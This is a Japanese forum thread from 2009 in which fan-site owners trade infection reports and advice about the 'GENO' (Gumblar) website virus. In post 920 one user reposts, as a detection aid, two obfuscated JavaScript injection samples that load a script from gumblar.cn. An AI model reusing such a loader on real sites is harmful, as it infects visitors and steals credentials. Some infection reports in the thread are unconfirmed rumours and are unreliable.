776:GENO 報告は名前欄に「報告」推奨
09/05/16 17:56:09 ujLFTIV80
だが1のこれ

>感染の場合ワクチンはなく、クリーンインスコ必須、パス変必須(FTPパス抜きされる)です。

はっきりいって被害の実態がわかりにくいよね
確認点は2でいいと思うよ
そろそろ次スレのテンプレ考えるわ

777:geno
09/05/16 17:56:10 MBvlamBZP
ここには知識人が集まってると思うのかもしれんが
みんな自分で調べてきたから知ってるだけだ

大抵の答えはwikiや2ちゃん内にある
今回はとりあえずググるな
調べろ

778:GENO・チラ裏
09/05/16 17:56:16 Sb/N6fL20
てめぇでやれることは全部やったけど同人サイトはおろか、企業サイトを回るのも何か気後れする…
通販で頼みたいものとかもあるのに微妙に恐怖感がある自分はチキンw

それこそこれがもっと巨大サイト(ヤフとかwikiとか楽天TOPとか)が感染してたらもっと大々的に取り上げられて
危機感ももっと生まれるんだろうけど、そんなことになったらパンデミックどころの騒ぎではないな…

779:GENO
09/05/16 17:56:36 sJSkDarN0
そろそろデザフェス帰り組の質問攻勢が始まりそうな予感が…

780:報告補足
09/05/16 17:56:36 0G5FPF7HO
>>768
>>762
幸の管理人さんの個人サイトが感染してると言ってたので、幸も感染してると思います
当該サイトと幸は既に削除済みですけど大事件の予感

781:GENO
09/05/16 17:56:59 RlsoA2wS0
5月7日にjavascript切ってない状態の火狐で感染サイト見たが
症状は現れず、ニフティのスキャンでも検出されない
まあ、感染サイトを見たのは確実なので再インスコするが
感染してても全く分からないことがあるかもしれんって報告だけしとく

782:GENO
09/05/16 17:57:22 TV+NV+ev0
日本の同人が終わる日が近づいてる…のか?

783:GENO
09/05/16 17:57:22 JLSn9lA+0
>>762
ポーン( Д )⌒Y⌒Y⌒Y⌒Y⌒Y⌒...。....。コロコロ
やばいどころのレベルじゃなかったか

>>774
うん、>>762を見る前だったのよ、ごめん

784:GENO
09/05/16 17:57:51 OPjvi40EO
>>770
FC2は各種障害を広報しなかったり
全然復旧してないのに「解決しました」と言ったり
運営側より有志のサポートのほうが安心だったりする

785:GENO
09/05/16 17:58:36 A9qSW+uH0
>>780
てかサーチ感染の場合はジャンル教えてほしいんだけどな

786:GENO
09/05/16 17:58:39 RwVE/EfH0
>>780
削除して黙ってるのかひょっとして!?
ウイルス注意とか書いてある跡地すらないんかい!?

787:GENO
09/05/16 17:58:40 58PrCe2G0
明日にイベがあった気がするから
オフもやってる管理人はもしかしたら気づいてない人も居るかもと思うと…

788:GENO
09/05/16 17:58:55 5qGyw+II0
>>781
感染してても、PCの環境によっては反応を起こさないらしい
やっぱりXPでIEな層狙いなんだろうな

789:GENO
09/05/16 17:58:56 vNLIWV+e0
うげぇ、幸感染は被害甚大だぞ。

790:GENO
09/05/16 17:59:27 wC2VoGPT0
跡地がないなら最低の幸管だな

791:GENO
09/05/16 17:59:37 vNLIWV+e0
>>785
ボーカロイドだと思うよ

792:geno
09/05/16 17:59:40 fsWEj42p0
>>780
もしボカロ系SNS参加してるならそっち経由でも周知したほうがいいかもしれんね・・・。

そんでもって確か明日ボーマスだよな。

793:GENO
09/05/16 18:00:02 skrVh21r0
>>787
明日大阪インテでシティあるから遠征組みは明日の夜以降に気づきそうだな

794:geno
09/05/16 18:00:10 t+UZlBwU0
手ブロやってる人は描いてくれたら嬉しいなと思うんだけど
どうなんだろう・・・何となく手ブロにいるリアな人達は全く無警戒ぽくて怖い

795:2
09/05/16 18:00:10 n/uQJHr/0
>>780 幸はボカロでいいすか

>>758修正しました
名前欄とても助かります
他の方もせめて>>2にアンカもらえるとうれしい

796:GENO
09/05/16 18:00:18 GfLVqANbO
明日はインテじゃなかったか
しかも地理的にリアルインフル発生、厚生大臣が朝からずっとインタビューしてたぞ

797:GENO
09/05/16 18:00:42 smog3tIQ0
ウイルス感染に伴いサイト削除ついでに閉鎖ってとこも多いだろうなあ…

798:GENO
09/05/16 18:01:54 OmZTJmEN0
924 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 17:56:27
ふたばもやられたみたいなスレ見たが

799:GENO
09/05/16 18:02:23 M2vWSK4y0
まとめサイトの隠の王が陰の王になってるんで修正よろしくです。

800:G
09/05/16 18:03:00 ZLwS0etV0
うーん、レスに埋もれたか居なくなられたか良く分からないけど、>>709はもういいので
クリーンインストールしてください。

801:geno
09/05/16 18:03:21 Sg4Oi56G0
明日、インテックス大阪でイベントあるよー
赤豚主催のオールジャンル
基本は女性メインだけど、一概には言えない

お買い物リスト作るために、サイトを巡回する人が
今夜は多い悪寒……

802:GENO
09/05/16 18:03:27 Rw1rL7iI0
780はボカロだろ?最初に書いてある

803:GENO
09/05/16 18:04:01 xmkBc4L6P
「ウィルス蔓延を防ぐことよりジャンルwを維持するほうが大事!」って人は
リアルでなんか病気が流行してもコミケとかに無理矢理行って感染拡大させてるようなもんだと思え。


今回のウィルスじゃないが、
女性向け同人同士だと正直知り合い程度の人に名乗って「ウィルス感染してるよ」って注意しにくいし
注意しても「えーよくわかんない;;;サイト消せばいいの?」って程度の人多いよ。
でもそんなこと言ってる場合じゃないなw

804:GENO
09/05/16 18:04:30 wQTybYbw0
気づいてないだけの人もまだまだ多いだろうから感染者
これからまた増えるだろうね

805:GENO
09/05/16 18:04:46 RwVE/EfH0
インテはインフルとでダブルパンチになりそうな………

806:GENO
09/05/16 18:05:30 RwVE/EfH0
>>2さん
隠の王だよ陰じゃないよー

807:GENO
09/05/16 18:05:51 SyLRqLEN0
>>763
あれ? じゃあ未知の脆弱性ってこと?

>>769
今まであちこちのスレで報告されてきたものに関していえば絶対防げるだろ。
それ以上何を期待してるんだ。

808:GENO
09/05/16 18:06:47 wkc6k7iU0
>>803
とっくに終わった話題を引きずらないでこれからの話をしようぜ先輩
つか今多くが見てるであろう携帯クラシックメニューからAA判定されちゃってるから

809:GENO
09/05/16 18:07:03 VbtPfjcW0
絶対防げるはありえないな
ましてやGENOは駆除もできない極悪ウイルス

810:GENO
09/05/16 18:07:10 lFaYB71c0
跡地すらも感染してるよって報告が今までに何件かあったし
再インスコでまたお知らせ出せるまでには少し時間かかるだろ
優先順位をどうすべきなんだこれ…

811:GENO
09/05/16 18:07:11 IgRMmjVnO
今携帯だからちゃんと確認出来ないけど、ふたば虹裏もやられたっぽいので注意

812:GENO
09/05/16 18:07:37 58PrCe2G0
ウイルスでリアルもサイト(二次元)も\(^o^)/オワタなんて事になるよか
きっちり確認とか取れるだけの対策しておくれよーと思うんだが
サーチ管理人に伝達しても注意喚起してくれねえ…
わかんねえなんて言ってるうちに、オワタになったらどうするんだよ…
どうにかして注意喚起できないだろうか

813:GENO
09/05/16 18:07:56 pcqA0/KN0
虹裏やられたってやばいな
すごい被害になりそうだ

814:GENO
09/05/16 18:08:23 OmZTJmEN0
>>803
豚インフルも流行ってるのに今更キャンセルできなーいって
強行に海外旅行に行った馬鹿共と同類だな

815:GENO
09/05/16 18:09:08 wkc6k7iU0
>>810
とりあえずサイトに埋め込まれちゃってるなら跡形なく削除が最優先じゃないかな
跡地はなんか危険っぽい

816:GENO
09/05/16 18:09:18 TV+NV+ev0
>>811>>813
( ゚∀゚) アヒャヒャヒャヒャヒャヒャ

もうネットできんなこりゃ…

817:GENO
09/05/16 18:09:23 lA4iAsSeO
警告文や謝罪文をうpしようにも、クリーンインストール前じゃ感染してるページを
うpするだけなんだし、まずはサイト全部削除でいいんじゃね?
クリーンインストール終わったら各ソフトアップデートしたりavast!入れたり
火狐入れたりJavaScript切ったり対策して、FTPパス変更→警告文謝罪文作成&
うpってなるから、作業遅い人は半日位掛かるよね…

818:GENO
09/05/16 18:09:43 31a6R3Rs0
明らかにおかしいスクリプトがheadとbodyの間にあったら、それはもう確定でいいんだよな?
巡回サイトのソース覗いたら@はさんだ数字の羅列が存在してた\(^O^)/
一応vista使いではあるんだが、あれって感染する場合は閲覧→即時感染なのかな
タイムラグがあるんだったらこまめにチェックしないと危ないってことだよな

adobe readerは9.0、フラッシュは最新なんだが、ここを最新にしとけばとりあえずは
問題ないってことでOK?

819:GENO
09/05/16 18:09:47 oibHTpS80
昨日自分も新刊チェックでサーチとか回ったけど、
感染はしてなくてホッとした(ウイルスの事は今日知った)
でも自ジャンルは安心…とは長くは言ってられないかも

820:GENO
09/05/16 18:09:51 wQTybYbw0
対策したつもりで出来てないとこが意外に多いんで注意な

821:GENO
09/05/16 18:10:03 njQJ2zNKO
今、出先でこの現状を知ってガクブルしてるんだが
自サイトのブログにも今すぐ、この件についての記事を書いて注意換気すべきだろうか?
(携帯から記事書き込めるので

822:geno
09/05/16 18:10:43 q2sKnS5r0
>>794
描いてくれてる人がいて今のところランキング1位になってる
他にも結構描いてる人いるから手ブロは大丈夫だと思いたい
手ブロはリア小とかもザラだからな…

823:GENO テンプレ1案
09/05/16 18:11:07 ujLFTIV80
2以下はまかせた
セキュ板のスレ誘導はどうするんだ?するなら2以下に

-----------------------------------------------------------------

新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。

特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。

【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
 パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
 感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
 そのサイトを見た人を感染させます。

Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
 新種も現れており安心できる状況ではありません。

詳細・感染の確認方法・対策は以下のまとめWikiと>>2-5あたり

同人サイト向け・通称「GENOウイルス」対策まとめ
URLリンク(www31.atwiki.jp)


824:GENO
09/05/16 18:11:19 vNLIWV+e0
虹裏がやられたってマジでか

所で素朴な疑問なんだが
sqlsodbc.chm
こいつのバックアップを取っておいて感染後上書きするとどうなるんだろうか

825:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:11:33 I41uEJFb0
とりあえず友達全員に教えといたわ
イベントあるならイベントで会った人にいっとけばいいんじゃね
後マスクくらいしろよ

826:GENO
09/05/16 18:12:08 mOudVfSD0
>>821
そんくらい自分で判断出来んなら何もしなくていい

827:GENO
09/05/16 18:12:23 GRAKPFWg0
>>821
自分はサイトの日記に書いた
一人でも多くの人間が注意を促せば、それだけ被害は少なくなると思う

828:GENO
09/05/16 18:12:46 uy8wj/XV0
>>807
あのな亜種って知ってる?

829:ま
09/05/16 18:14:02 LEjfHM+rO
酷いな…同人も大打撃じゃないか。

ジャンル存続云々より、今はウイルス拡大防止だろ。

ウイルス騒ぎで一時サイトが閉鎖したりしても、騒ぎが終息してから復活する人は復活するだろうし、しなきゃそれまでの想いでした、って事だろ。

こんな時にまでジャンルジャンル騒いでる奴ってアホだな。

830:GENO
09/05/16 18:14:13 STQt++5e0
>>818
vistaは現時点では大丈夫みたいだが、
オンラインスキャンとsqlsodbc.chmのチェックはしといたら?
自分もvistaだけどやれる事は全部やったよ

831:じぇの
09/05/16 18:14:15 LgAPtote0
>>821
さすがそれくらいは自分の好きにしたら…?

832:GENO
09/05/16 18:14:16 4qrTmet30
伏字がどーの言う前に
wikiの見方もわからん
自分のサイトのソースの見方もわからんような奴のサイトは
この際全部消えてしまえばいいよ…
これで2次ジャンルの危機管理、意識とか主張されてもバカバカしい

833:GENO
09/05/16 18:14:58 q2sKnS5r0
>>823
セキュ板への誘導はなしでいいと思う
これ以上初心者あっちに流したくない
同人の所為で広まったみたいな認識になってきてるし

834:GENO
09/05/16 18:15:09 mX/VopHL0
>>823
セキュ板のスレ誘導はしないほうがいいな
向こうであれてしまう

835:GENO
09/05/16 18:15:37 kN7C0/bl0
>>823
おk

セキュ板の誘導はない方がいい
向こうも質問厨が押し寄せて半ばカオス化してる

836:821
09/05/16 18:15:56 njQJ2zNKO
レスあり、記事書くわ

>>823のテンプレ貰ってく。
帰宅次第自分のPCチェックしてファイルのバックアップ取る
まだ報告ないジャンルなんで間に合っててくれ……

837:げの
09/05/16 18:16:10 afm0lJ4jO
>>821
サイトトップに注意書きと簡単なまとめ載せてみた
でもドピコだし騒動でかなり人来なくなってるから意味ないな…
もっと大きなサイトなら良かったんだが

838:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:16:45 bmeWatfA0
>>807
おまいこそ何を期待してるんだ

839:GENO
09/05/16 18:16:52 lapl18Rv0
>823
セキュの誘導はもうしないほうがいい
これから新しく来る今北さんたちが向こう行ってもどうにもならない
向こうで初心者質問くりかえしてフルボッコに合うのが関の山だと思う

840:GENO
09/05/16 18:17:15 xmkBc4L6P
そりゃ「同人ローカルルール>>>>ウィルスへの注意喚起」と主張する人おおすぎで
「同人ってなにそれこわい」ってなられるのも当然だろ・・・。
企業が感染隠したりする対応も叩かれてるというのに。

841:GENO
09/05/16 18:17:19 pcqA0/KN0
海鮮だから二次感染の危険性だけはないけどネット通販とかよく利用してるからめちゃくちゃ怖い…

842:GENO
09/05/16 18:17:47 uHPzWLxWO
意味ないけどふたば携帯でみてきた

二次裏は通常通りスレ進んでます
管理人要望板にもウイルスの報告なし

843:名無し
09/05/16 18:17:51 2rvHCm1xO
携帯サイトのサーバーもやばいの?

844:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:17:58 eQafMeB50
感染確認されたり何も分からなくて不安なら
セキュリティ上何の断りも無くとも即閉鎖するのは正しい
維持やめんどうでほったらかしで撒き散らすのは迷惑

845:geno
09/05/16 18:18:44 JMWvRLu6P
>>790
再インストールしてパス書き変えたら跡地つくるつもりかもよ

846:
09/05/16 18:18:44 dhazjnvD0
>>824
そのファイルはあくまで目印になってるだけで
他にもやられるファイルはある

847:GENO
09/05/16 18:19:32 oRZKM7s90
>>837
小さなことからコツコツと、だ。
誰もやらないより一人でも多く呼びかけるようやったほうがいいと思う。

848:GENO
09/05/16 18:19:56 OPjvi40EO
>>843
以前に愛島全体がウィルスにやられたことあるだろ
安心すんな

849:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:20:26 XpshxGrz0
>>581
もう遅いけどノートン入れてたら先生の仕業じゃなかったかな

850:GENO
09/05/16 18:20:58 SyLRqLEN0
>>828 >>838
あー、閲覧側に限った話をしちゃってたんで、それで行き違いがあるのかな。
どういう亜種が現れているのか知っていたら教えてほしい。
Flash PlayerとAdobe Readerを最新版にしていても、両者が原因でGENO関係で被害を受けたって報告があるんですか?
ただ、もしそうなら未知の脆弱性で被害が拡大しているわけで、セキュリティベンダーはもっと速く動いていると思うんですが。

851:GENO
09/05/16 18:21:19 IgRMmjVnO
明日はケットコム主催のボーカロイドのイベントあるんだけど、ボカロサーチが感染してるならケットコムは大丈夫なんだろうか
ケットコムも感染してたらヤバいな

852:GENO
09/05/16 18:21:25 lA4iAsSeO
>>824
sqlsodbc.chmだけ直しても無駄。それはウィルスの症状の1つってだけなので
『豚ウィルス感染!解熱剤で熱下げたから咳出まくってるけど大丈夫だよね』って
言ってるのと同じ。

対策大丈夫!っていってる人も今回のウィルスは亜種が出易いのが怖いってーのを
覚えてくれ…avast!優秀でも最新の亜種は分からんのよ…いつvistaやIE7でもやられる
亜種が出てもおかしくないのよ…orz

853:GENO
09/05/16 18:21:49 wQTybYbw0
ノートン先生なら今俺の隣で寝てるよ

854:ゲノ
09/05/16 18:21:58 73r3a0iJO
虹裏やられたってのはソースあるの?デマ?

855:GENO
09/05/16 18:22:03 i6/Zrtyj0
>>851
それは本当に洒落にならん…

856:GENO
09/05/16 18:22:06 ouvbuwBb0
回線なら大丈夫とか思っている人がいるようだけど
踏み台に利用されるという点では去年の薬屋ウイルスよりたちが悪いウイルスだよ。

857:報告
09/05/16 18:22:18 QEvo2/9u0
545 名前: コバノランタナ(関東・甲信越)[] 投稿日:2009/05/16(土) 18:19:21.70 ID:XdcmiJ/i
スレに書き込んでる途中に連投になったので、転載お願いします!

ボカロ幸感染報告したものです。
幸管理人さんの友人の幸の感染が確認されました。
サイト自体に埋め込まれちゃってるらしくどうしようもないです。
登録は5000ほどで、二次音楽だそうです(ボカロ・歌ってみたランキング的なもの)
明日がボーマスなせいで今日だけでもカウンターが7000は回ってるみたいです!
注意喚起してきます。


【管理も】同人サイト・GENOウィルス注意2【閲覧も】
スレリンク(doujin板)
↑このスレです。誰か転載お願いします!


取り急ぎ転載 ダブったらすまん

858:GENO
09/05/16 18:22:44 BfrfM/sk0
来たよ
自サイトで注意喚起したら「ねらだったんですね!」米が
こんな時に自分がねらだってばれる心配なんかしてられるかと憤慨して言ってやりましたよ

「知り合いから聞きました」

859:geno
09/05/16 18:22:53 JMWvRLu6P
7000…!

860:GENO
09/05/16 18:23:23 WMHVCQg00
質問なんだがJavaScript使ってないから2ちゃんの専用ブラウザは平気なんだよな?

861:geno
09/05/16 18:23:28 WSWfbe9U0
7000とか…怖すぎるな…

862:サイト”管理”人
09/05/16 18:24:08 cpNxQDbiO
すみません
ウイルスの件今知った者です
自サイトのソースをチェックしようと思うのですが、ウイルスが感染した際に貼られるjavaはどのようなものかご存知の方おられましたらお願いいたします。

863:GENO
09/05/16 18:24:48 ouvbuwBb0
マジレスすると、まずはAdobe製品の脆弱性、を強調して告知した方がいい
去年の薬屋ウイルス騒動もFlash Playerの脆弱性を全面に出して告知して
周知が広まった。

その後で同人系・ねら系まとめに誘導

864:GENO
09/05/16 18:24:49 2baUUktp0
7000がまた広がるんだろ?
なにこのウイルス・・・

865:GENO
09/05/16 18:24:52 cK7QQ7hl0
>>854
どっちであっても今虹裏見に行くのは自殺行為

866:GENO
09/05/16 18:25:01 JLSn9lA+0
>>857
えらいこっちゃ…

867:GENO
09/05/16 18:25:23 RwVE/EfH0
>>850
いや、今後どんな亜種が現れるかわからない、
現状これで完璧はありえないって注意喚起してんだろ
いいかげん気づいてくれよ


868:geno報告というか依頼
09/05/16 18:25:28 jxRVr/+e0
まとめ管理人様おつかれさまです

「とりあえず感染してるか確認する手順」の

>→ XPユーザー
>  背景が黒いウィンドウを選択。
>  小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
>   \を全角にしてあるので、コピペせずすべて半角で手入力すること

の辺りかFAQに

>「ドライブCのボリュームラベルがありません C:\WINDOWS\system32のディレクトリファイルが見つかりません」
>と出た場合、マイコンピュータのCドライブのプロパティ開けて
>全般タブの一番上にある空欄に適当な名前を付けてから再度検索するか
>マイコンピュータからフォルダを辿って直接system32内を探してください。

って追記してもらえないか
ボリュームラベルがないのとウイルスとは別問題だし、再起動でどうこうなる問題でもない
普通に使う分にはなくても構わないラベルだしな

869:geno
09/05/16 18:25:43 fsWEj42p0
>>857
え、歌ってみたも入ってんのか・・・

870:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:26:16 bmeWatfA0
>>850
一応関連スレを覗いているが、最新版で被害報告はないみたい。
但しそれも現時点で、って話だからね。今後どうなるかはなんともいえないから
絶対安全って言わない方がいいと思う。初心者はそれで安心してしまう。

亜種は現れてるよ。
ただセキュ板荒れててそんな話をする状況じゃないね。

871:ge
09/05/16 18:26:29 wh+11tX1O
>>862
>>125

872:GENO
09/05/16 18:26:29 RwVE/EfH0
>>862
>>1

873:GENO
09/05/16 18:26:30 TV+NV+ev0
>>857
オワタ

874:GENO
09/05/16 18:26:42 k7S1lClv0
>>858

うちもきっと来るわ
そしたら、そのセリフ借りるね……

875:GENO
09/05/16 18:26:43 lYCNv42G0
>>867
もう触んな…そっとしておけ

876:GENO
09/05/16 18:27:24 Gh3ZB53n0
エヴァ(小説サーチ)
小野不由美(サーチ)
ボーカロイド(サーチ2つ?1つは登録1700、もう1つは登録数5000でカウンター7000/日)

リボーン(オンリー+プチオンリー告知サイト・ファンサイト)
鋼の錬金術師(オンリー告知サイト)
おお振り(アンソロ告知サイト)
戦国BASARA(アンソロ告知サイト)
咎狗の血(アンソロ告知サイト)

ヘタリア (PC鯖使用の携帯向け同盟)

とりあえず大規模感染いきそうなのはこのあたり?ボカロやばいな

877:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:27:34 XpshxGrz0
>>862
>>633の画像みたいな意味不明なやつらしい
自分自身で感染例を見たわけじゃないので詳しい人頼みます

878:GENO
09/05/16 18:27:39 Q3syTjec0
>>854
ソースに妙な物は無いね
デマだろ

879:GENO
09/05/16 18:28:53 lGXsY/+00
なんか大量感染で加速しそうな悪寒
早めに次スレ用意したほうがいいと思います

880:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:29:00 Q6FwpwdZ0
男性向けショタ系サイトも危ないというレスをみた

881:sage
09/05/16 18:29:04 afm0lJ4jO
ねらばれも何もうちは投下したやつ置いてるから今更だぜいヒャハァ


だからお付き合い広げなかったんだがw

882:GENO
09/05/16 18:30:01 NvgL4rYM0
とりあえず自サイトが感染してないかどうかを調べたいんだけど
データ全部ローカルに落としてもPC感染しますか?

883:geno
09/05/16 18:30:01 ivgR4yei0
ほんとごめん
幸ってなに? 教えてほしい
同人やってるが2chではあんまり同人系回らんから
わからんのだわ

上にもあったけどはっきり明記されなくて困ってる
CPのことか?

884:G
09/05/16 18:30:22 ZLwS0etV0
すまんが、セキュ板の方へのリンク貼るのは止めてもらえ無いだろうか。
あっちからは貼ってるから分かると思うんだ。

885:GENO
09/05/16 18:30:23 STQt++5e0
>>883
サーチの事

886:GENO
09/05/16 18:30:31 WMHVCQg00
幸=サーチエンジン

887:げの
09/05/16 18:30:34 GfLmKoZqO
>>883
サーチエンジン

888:GENO
09/05/16 18:30:35 Q3syTjec0
>>883
俺も知らなかったが話の流れから見ると「サーチ」のようだ

889:GENO
09/05/16 18:30:39 nyj37hss0
虹裏って何の伏せだ?


890:geno
09/05/16 18:30:49 LkZJEwj50
>>883
幸=サーチ

891:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:30:50 DUu+Qe+w0
>>883
サーチ

892:げの
09/05/16 18:30:56 afm0lJ4jO
>>883
サーチ

893:geno
09/05/16 18:31:04 jxRVr/+e0
>>900は次スレよろ

894:GENO
09/05/16 18:31:06 0gY22C790
>>857
OMG
ボカロもサブでやってる人多いだろうに・・・なんてこったい

895:GENO
09/05/16 18:31:14 z6rWJ7hcO
>>883
さーち

896:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:31:25 SUmAXbK30
PCニュースにスレッド立ってるけど
萌えニューに立ててもらった方がいいんじゃないだろうか
どうやってスレ依頼するのか知らないが・・・

897:GENO
09/05/16 18:31:26 dUhoo+Zw0
まとめ管理人さん、お疲れ様です。

>>633の画像をwikiに入れたらいいのではないかと思うのですが…。
自分でソース見て判断する時の助けになるかと

898:GENO
09/05/16 18:31:32 pbsx4U5a0
オマイラの優しさ連携プレーに全俺が泣いた

899:GENO
09/05/16 18:31:33 JJXVNcG60
この時間帯ならもうねらじゃない人も注意文書いてるし、ねらバレしないだろ

900:geno
09/05/16 18:31:49 WSWfbe9U0
>>883大人気だなw

901:geno
09/05/16 18:31:55 fsWEj42p0
>>876
ボーマス遠征組の状況次第では対策に時間かかるかもしれないな

902:geno
09/05/16 18:31:57 LkZJEwj50
883の人気に嫉妬

903:GENO
09/05/16 18:32:22 v6bKeM/v0
このスレに限り、伏字なしの方向にしない?
日頃、同人板を覗かないサイト持ちも注意勧告につられて来ているようだし

今回の被害は深刻だから
初心者にも分かりやすいスレにしたほうがいいと思う
せめて伏字ぐらいは

904:GENO
09/05/16 18:32:41 k7S1lClv0
>>889
ふたばちゃんねるの画像掲示板の二次元裏

905:883
09/05/16 18:33:03 ivgR4yei0
あああああ!
なんで分からなかったんだろう!
みんな即レス、ありがとう!

サイトに注意のせてきます

906:GENO
09/05/16 18:33:06 RwVE/EfH0
>>882
まず自分のPCをチェックだ

907:geno
09/05/16 18:33:15 LkZJEwj50
>>900
次スレよろしく
*****************以下減速***************

908:GENO
09/05/16 18:33:16 smog3tIQ0
用語集イチイチ作るより伏字なしのが良いだろうね

909:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:33:17 XpshxGrz0
刷れ立ては900?

910:GENO 報告は名前欄に「報告」推奨!
09/05/16 18:33:39 ujLFTIV80
>>857 やべえ……
Wiki管理人さん、これは大きくとりあげたほうがいいかもしれませんよ

>>858
この事態を知りながら人に注意もせずに、注意喚起したおまいに馬鹿米するとは…
そんな暇な糞野郎より、おまいのほうが1万倍立派だよ。馬鹿はスルーしとけ。

>>896
同人系だけの話じゃないから、周知を考えればニュー速+でもいいくらいだ

911:GENO
09/05/16 18:34:16 hsMweheE0
>>840
いまその話してるのお前だけなんだが誰と戦ってるの?

912:GENO
09/05/16 18:34:47 ZjGJKiW50
>>858
それ分かるってことはお前もねらーじゃねえかと突っ込みたくなるなw
魔法の言葉GJ

913:GENO
09/05/16 18:35:42 BrvMDLebO
動画サイトで一個感染してたところがあった
そこに最近本編が大量アップされて、まとめサイトにもリンクがはられてた
南公園ももしかしたらやばいかも

小さいジャンルだから大丈夫だとは思うけど…

914:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:35:46 52KxMhxe0
sqlsodbc.chm立ち上がらないわソース開けないわネットは強制終了炸裂だし
これはもうアレか・・・  再インスコ準備するわorz

915:GENO
09/05/16 18:37:19 k7S1lClv0
しっかしサイトトップに注意書き貼っておいても読む人少ないわー
5%も居らん

916:GENO
09/05/16 18:37:38 OPjvi40EO
>>913
動画サイト名kwsk

917:GENO
09/05/16 18:38:04 pbsx4U5a0
サイトトップと日記に大きく書いてたほうが効果的かもしれんね。

918:
09/05/16 18:38:12 dhazjnvD0
>>914
立ち上がる必要はないんじゃないの?

919:GENO
09/05/16 18:38:36 JLSn9lA+0
>>915
それでもないよりはマシだ
そう思うことにしておこうや

920:GENO
09/05/16 18:39:12 5AlQPwu90
セキュリティ板のGENOスレ4にあったJavaScriptの一例貼るよ

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト

- - - - - - - - - - - - - - - - - - - -
もちろんこの限りではないだろうね
虹裏が~とかヤフーが~とか今日なんか色々出てたけど愉快犯がデマ流してるのもあるだろうけど、
あんま普段JavaScriptのコードとか見たことない人が、普通のウイルスでも何でもないJavaScriptのタグ見て
「ウイルス感染してる!」とか勘違いして騒ぐ件も少なからずありそう

921:GENO
09/05/16 18:39:22 JWfK2nMr0
>>915
5%の人が認知してくれているじゃないか

922:GENO
09/05/16 18:39:26 RwVE/EfH0
>>913
お願いですからサウスパークと明記してください

923:GENO
09/05/16 18:39:39 epEXNtBJ0
イラストサイトの人は
キャラクターに噴出しで注意!とか言わせてる絵を
トップに置いとくとか出来そうだな

924:GENO
09/05/16 18:39:46 uHPzWLxWO
これはもうだめかもわからんね

925:GENO
09/05/16 18:39:49 58PrCe2G0
>>915
自分も書いたしリンクも張ったが
一割以下しか見てない。そもそもの絶対数が少ないってのもあるが
多くが見るであろう大手とかに限ってオフしてるの多いから、原稿中だの遠征中だので
気づいてないのかも…
平日の昼日中じゃないだけマシなのか、イベント前だから余計アレなのか…

926:GENO
09/05/16 18:40:23 Q3eRMW+S0
伏せたいやつは伏せて伏せたくないやつは伏せないでいいよもう…
伏せる伏せないより情報が集まる事の方が重要だろ

927:GENO
09/05/16 18:40:25 YM6POmPN0
>>862
まだ見てるかな?
HTMLファイルは<body>タグより上、.jsファイルなら最下行に見覚えの無い
<script language="JavaScript ~ </script>があったら、
そのタグ内に replace(**,***,*) or replace(**|***|*) の文字列があるかどうか探す
スクリプトからreplaceの括弧内の文字列を削除してエンコードすると
ウイルスダウンロード先のアドレスに変わる仕組みになっている
ソースをreplaceで検索してみるといい

928:GENO
09/05/16 18:40:39 APiqzc70O
>>915
